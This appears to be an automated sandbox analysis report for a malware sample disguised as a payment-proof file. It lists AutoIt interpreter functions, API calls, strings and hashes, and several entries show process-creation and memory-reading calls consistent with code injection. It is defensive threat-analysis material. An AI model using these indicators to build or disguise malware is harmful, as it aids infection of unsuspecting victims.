Instruction Fuzzy Hash: 41415DF6A88155A7DB206F69EC4AFFA37A9F704310F640115F591921C1CF799900BFA1

Function 00FB3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00FB3E79
LoadCursorW.USER32(00000000,00007F00), ref: 00FB3E88
LoadIconW.USER32(00000063), ref: 00FB3E9E
LoadIconW.USER32(000000A4), ref: 00FB3EB0
LoadIconW.USER32(000000A2), ref: 00FB3EC2

Part of subcall function 00FB4024: LoadImageW.USER32(00FB0000,00000063,00000001,00000010,00000010,00000000), ref: 00FB4048

RegisterClassExW.USER32(?), ref: 00FB3F30

Part of subcall function 00FB3F53: GetSysColorBrush.USER32(0000000F), ref: 00FB3F86
Part of subcall function 00FB3F53: RegisterClassExW.USER32(00000030), ref: 00FB3FB0
Part of subcall function 00FB3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB3FC1
Part of subcall function 00FB3F53: InitCommonControlsEx.COMCTL32(?), ref: 00FB3FDE
Part of subcall function 00FB3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB3FEE
Part of subcall function 00FB3F53: LoadIconW.USER32(000000A9), ref: 00FB4004
Part of subcall function 00FB3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB4013

Strings

AutoIt v3, xrefs: 00FB3F1F
#, xrefs: 00FB3F09
0, xrefs: 00FB3F02

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 4563a51c56b02d79e6f0efa3ef144c51d0530e7ae49928ebd651c9c25a87bee4
Instruction ID: 4345e274b597b3ac39afc32b789c508382df0f157305e7979c7b262424f4b090
Opcode Fuzzy Hash: 4563a51c56b02d79e6f0efa3ef144c51d0530e7ae49928ebd651c9c25a87bee4
Instruction Fuzzy Hash: 472160B0E04308ABCB21DFA9EC46A99BFF5FB48310F10412AE244B72D4D7BA4600DF91

Function 00A1BEC8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A1BF99
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A1C1BF

Memory Dump Source

Source File: 00000001.00000002.1297510516.0000000000A19000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a19000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: d84d655036b7578c91141cbd578250408c0144d21834394f497142810eadaeb5
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: DAA12774E40209EBDB14CFA4C898BEEBBB5FF48314F208559E505BB281D7799A81CF64

Function 00FB49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00FB4A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 010241DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0102421A
RegCloseKey.ADVAPI32(?), ref: 01024249

Strings

Include, xrefs: 010241D3, 01024212
Software\AutoIt v3\AutoIt, xrefs: 00FB4A13

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 24dbbd6ecdfa4a342aa020dbcdad8a0663f00e6ecd4508be4f15aa7f9f20a832
Instruction ID: 80581d6386cbb4710b24e68cf731d04b66a466fff52a69427ff0e95f6aaa3c3f
Opcode Fuzzy Hash: 24dbbd6ecdfa4a342aa020dbcdad8a0663f00e6ecd4508be4f15aa7f9f20a832
Instruction Fuzzy Hash: A6119071600109BFEB14EAE5CD86EEF7BACEF04744B100068F542D6051EA75AE05AB50

Function 00FB36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB36E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3707
ShowWindow.USER32(00000000,?,?,?,?,00FB3AA3,?), ref: 00FB371B
ShowWindow.USER32(00000000,?,?,?,?,00FB3AA3,?), ref: 00FB3724

Strings

AutoIt v3, xrefs: 00FB36DE, 00FB36E3, 00FB36E4
edit, xrefs: 00FB3701

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ef28b561a6c407e36027cbec5e10d43ae097b0cfb9e5e933e82992292612770e
Instruction ID: 1706e55eb4655e78c205d3e24b7cdd1aa80edab652e45ce17e6e4e913a539b75
Opcode Fuzzy Hash: ef28b561a6c407e36027cbec5e10d43ae097b0cfb9e5e933e82992292612770e
Instruction Fuzzy Hash: 7CF0DAB1A402D07AE73266A7AC49E672E7DE7C6F20B00001FBA44A6194D5BA1855DBB1

Function 00A1BCA8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A1BB98: Sleep.KERNELBASE(000001F4), ref: 00A1BBA9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A1BDC1

Strings

95PZHQS8240059TNBL96LVL, xrefs: 00A1BE24, 00A1BE27

Memory Dump Source

Source File: 00000001.00000002.1297510516.0000000000A19000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a19000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateFileSleep
String ID: 95PZHQS8240059TNBL96LVL
API String ID: 2694422964-980161640
Opcode ID: c4b2250fdc7dd436f62834b4796ca46f9c051f925526f44bba3c43cfee26033d
Instruction ID: b8f3466189a21e8551f0ea5d5a7488494f28fa805c2644186df75a43994f0a37
Opcode Fuzzy Hash: c4b2250fdc7dd436f62834b4796ca46f9c051f925526f44bba3c43cfee26033d
Instruction Fuzzy Hash: 35519630D14298DAEF11DBE4C859BEFBBB8AF15304F044199E2487B2C1D7B91B49CB65

Function 00FB51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00FB522F
_wcscpy.LIBCMT ref: 00FB5283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB5293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 01023CB0

Strings

Line: , xrefs: 01023CD9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 0fc5f40f1fe0bb0532668397d98670ffc97900690d996b6f6cdc4796ad6d3f14
Instruction ID: a5a1d1697ad5f56dc0f11ba4799400a3cb017bc0059c7a82eeeca20456e103bd
Opcode Fuzzy Hash: 0fc5f40f1fe0bb0532668397d98670ffc97900690d996b6f6cdc4796ad6d3f14
Instruction Fuzzy Hash: D3319E71908740AAD331EB65EC46FEE77E8AB44710F00451EF5C996182EBBCA508DFD6

Function 00FB4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00FB41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00FB39FE,?,00000001), ref: 00FB41DB

_free.LIBCMT ref: 010236B7
_free.LIBCMT ref: 010236FE

Part of subcall function 00FBC833: __wsplitpath.LIBCMT ref: 00FBC93E
Part of subcall function 00FBC833: _wcscpy.LIBCMT ref: 00FBC953
Part of subcall function 00FBC833: _wcscat.LIBCMT ref: 00FBC968
Part of subcall function 00FBC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00FBC978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 01023491
Bad directive syntax error, xrefs: 010236E4

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 2ba80b020ce219a83cd7194708ac6d13ceec9b431b95f5304b66718b58caf135
Instruction ID: 80eb38b196bca38e7bd0eefc130dee17448bf57729c5b9ca10f3661ba91e6c4d
Opcode Fuzzy Hash: 2ba80b020ce219a83cd7194708ac6d13ceec9b431b95f5304b66718b58caf135
Instruction Fuzzy Hash: 69919271910229AFCF14EFA9CD919EEB7B4FF08310F04446AF556AB291DB78A904DF90

Function 00FB4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00FB5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,01071148,?,00FB61FF,?,00000000,00000001,00000000), ref: 00FB5392

Part of subcall function 00FB49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00FB4A1D

_wcscat.LIBCMT ref: 01022D80
_wcscat.LIBCMT ref: 01022DB5

Strings

\, xrefs: 01022DA2
\Include\, xrefs: 00FB4B0A

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: 3a186a7a2f31012bf29a3fbc7b0b5161b94a0d27edbeed20a2290768544eb765
Instruction ID: ac4ef3b6d7e4e50d4772a9a8911a96370d897e2f5d1554ad269b77db0beeeaab
Opcode Fuzzy Hash: 3a186a7a2f31012bf29a3fbc7b0b5161b94a0d27edbeed20a2290768544eb765
Instruction Fuzzy Hash: 5E5160798043409BC324EF5AF98189AB7F4FFA9300F40492EF6C5A3245EB399548DF52

Function 00FD34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00FD34FE

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00FD3539
__wopenfile.LIBCMT ref: 00FD3549

Strings

<G, xrefs: 00FD34CD, 00FD34F0, 00FD34FC

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 40a6e4d582be4310ad5780be298b401975042653f7a9f7a2003cd027816b2731
Instruction ID: a5d4d90721d0b45ed3b94afbd3d27d8f9a5ff2c8fa0cf864e44f632ac39837ca
Opcode Fuzzy Hash: 40a6e4d582be4310ad5780be298b401975042653f7a9f7a2003cd027816b2731
Instruction Fuzzy Hash: 8311E771A003069FDB11BF719C4276E36A6AF46360B1D852BE415DB381EB3CCA01B7A2

Function 00FCD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FCD28B,SwapMouseButtons,00000004,?), ref: 00FCD2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FCD28B,SwapMouseButtons,00000004,?,?,?,?,00FCC865), ref: 00FCD2DD
RegCloseKey.KERNELBASE(00000000,?,?,00FCD28B,SwapMouseButtons,00000004,?,?,?,?,00FCC865), ref: 00FCD2FF

Strings

Control Panel\Mouse, xrefs: 00FCD2BA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 96fb52ed05b20e3e0729220129581dab28fbc4aaf8a9a57316a6035da613d3a5
Instruction ID: 4aac48b5b1ca9755702f1e0e59c595735bcf27afa1bb97ec9f8b33aa522607eb
Opcode Fuzzy Hash: 96fb52ed05b20e3e0729220129581dab28fbc4aaf8a9a57316a6035da613d3a5
Instruction Fuzzy Hash: 08113C75A11219BFDB208FA4C985FEFBBBCEF44754B104869F805D7110D731AE41AB60

Function 00A1AB98 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A1B3C5
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A1B3E9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A1B40B

Memory Dump Source

Source File: 00000001.00000002.1297510516.0000000000A19000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A19000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a19000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction ID: c853fe09293d064954997d99a0d9ee6c0a6830d0a202fdcc901fbd82e67b6ff3
Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
Instruction Fuzzy Hash: AF62FA34A14258DBEB24CFA4C851BDEB376FF58300F1091A9D11DEB290E7799E81CB59

Function 00FD365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FD36B7
_memcpy_s.LIBCMT ref: 00FD3729
__filbuf.LIBCMT ref: 00FD37AA
_memset.LIBCMT ref: 00FD37EE

Part of subcall function 00FD7C0E: __getptd_noexit.LIBCMT ref: 00FD7C0E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 86fbf06d6f7b55be740359757bde8383726f6f7b53433a03dab4eef6f9bb8ca6
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: 1751B6B1E04605ABCB249F69888466E77A3AB40330F2C872BF925963D0D775DF50FB52

Function 00FFC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00FB4517: _fseek.LIBCMT ref: 00FB452F

Part of subcall function 00FFC56D: _wcscmp.LIBCMT ref: 00FFC65D
Part of subcall function 00FFC56D: _wcscmp.LIBCMT ref: 00FFC670

_free.LIBCMT ref: 00FFC4DD
_free.LIBCMT ref: 00FFC4E4
_free.LIBCMT ref: 00FFC54F

Part of subcall function 00FD1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00FD7A85), ref: 00FD1CB1
Part of subcall function 00FD1C9D: GetLastError.KERNEL32(00000000,?,00FD7A85), ref: 00FD1CC3

_free.LIBCMT ref: 00FFC557

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction ID: d8858dce44f7a050e474a2db050c6b8329a501eb25a8dff48ca35ffdb7f6e608
Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction Fuzzy Hash: F2516CB1904218AFDB24DF64DC81BEDBBB9FF48300F1400AEB649A3251DB756A909F59

Function 00FCEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FCEBB2

Part of subcall function 00FB51AF: _memset.LIBCMT ref: 00FB522F
Part of subcall function 00FB51AF: _wcscpy.LIBCMT ref: 00FB5283
Part of subcall function 00FB51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB5293

KillTimer.USER32(?,00000001,?,?), ref: 00FCEC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FCEC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 01023C88

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: afc4eb36a6d5816420b12efe2ee751329a4f38756da46206cf29b8fca8c806cc
Instruction ID: 25a37aedc020c5fd151cabe17d6fbae59500292fcd52f623c1f07d3fd38a2284
Opcode Fuzzy Hash: afc4eb36a6d5816420b12efe2ee751329a4f38756da46206cf29b8fca8c806cc
Instruction Fuzzy Hash: B421DA709047949FE733DB28C855FEBBBECAB05314F04048DE6DA5B285C7792984CB51

Function 00FB40E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01023725
GetOpenFileNameW.COMDLG32 ref: 0102376F

Part of subcall function 00FB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB53B1,?,?,00FB61FF,?,00000000,00000001,00000000), ref: 00FB662F

Part of subcall function 00FB40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FB40C6

Strings

X, xrefs: 0102373E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: ee56d018837b3275cb756d47c32feef145f6da2336fad9c800b1a6f6f7a15aff
Instruction ID: 768b704fcb30e9adced8713734c97bfcfb66796862d9f1f858ad532dc9eff0ea
Opcode Fuzzy Hash: ee56d018837b3275cb756d47c32feef145f6da2336fad9c800b1a6f6f7a15aff
Instruction Fuzzy Hash: C121C671A10198ABCF12DF99CC45BDEBBFDAF49300F00805AE445AB241DBB865899FA5

Function 00FFC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00FFC72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00FFC746

Strings

aut, xrefs: 00FFC740

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d3ad2f69a8f69ada9a0a70af2dc1e4dcb2100ae14bbe5a38b864b65b8261c0b5
Instruction ID: 6dff759ac77f5e2264ccb0bef096667cb456fb1a745d74cec0a2443bd6c11169
Opcode Fuzzy Hash: d3ad2f69a8f69ada9a0a70af2dc1e4dcb2100ae14bbe5a38b864b65b8261c0b5
Instruction Fuzzy Hash: D5D05E7550030EABDB20AAA0DC0EF8A776CA710704F4001A07694A90A1DAB9E6998BA4

Function 0100F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
